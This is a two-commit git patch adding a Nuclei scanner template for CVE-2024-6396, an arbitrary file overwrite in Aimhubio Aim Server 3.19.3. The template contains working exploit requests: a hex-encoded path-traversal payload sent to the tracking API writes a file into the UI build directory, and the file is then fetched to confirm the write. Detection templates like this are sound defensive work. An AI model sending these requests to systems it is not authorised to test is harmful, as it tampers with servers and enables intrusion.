From 0ae7c00cb1e43e29549186acaaf7240bda129bc0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 27 Jul 2024 12:02:50 +0530 Subject: [PATCH 1/2] Create CVE-2024-6396.yaml --- http/cves/2024/CVE-2024-6396.yaml | 68 +++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6396.yaml diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml new file mode 100644 index 0000000000..7aa6b0e935 --- /dev/null +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-6396 + +info: + name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6396 + cwe-id: CWE-29 + metadata: + max-request: 3 + verified: true + fofa-query: icon_hash="-1047157256" + tags: cve,cve2024,aim,aimhubio,file-write + +variables: + filename: "{{rand_base(7)}}" + args: "{{ concat(hex_decode('000000000001000000060a000000fe0000000000000000fe004b000000042e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6c69622f707974686f6e332e392f736974652d7061636b616765732f61696d5f75692f6275696c642f'),filename, hex_decode('2e747874')) }}" + +http: + - raw: + - | + POST /tracking/client_1/get-resource HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "resource_handler": "my_resource", + "resource_type": "Repo", + "args": "AAAAAAABAAAABw==" + } + + - | + POST /tracking/client_1/read-instruction HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "resource_handler": "my_resource", + "method_name": "_backup_run", + "args": "{{base64(args)}}" + } + + - | + @Host: http://{{Host}}:43800 + GET /static-files/{{filename}}.txt HTTP/1.1 + Host: {{Host}}:43800 + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '{"handler":"my_resource"}' + + - type: word + part: body_3 + words: + - "{{filename}}.txt" + + - type: word + part: header_3 + words: + - "text/plain" From c43559d775f0428b7a16b9dc7658465c4cf5fdc7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 27 Jul 2024 12:23:48 +0530 Subject: [PATCH 2/2] Update CVE-2024-6396.yaml --- http/cves/2024/CVE-2024-6396.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml index 7aa6b0e935..34ca5ffad5 100644 --- a/http/cves/2024/CVE-2024-6396.yaml +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -1,7 +1,7 @@ id: CVE-2024-6396 info: - name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite + name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite author: iamnoooob,rootxharsh,pdresearch severity: critical description: |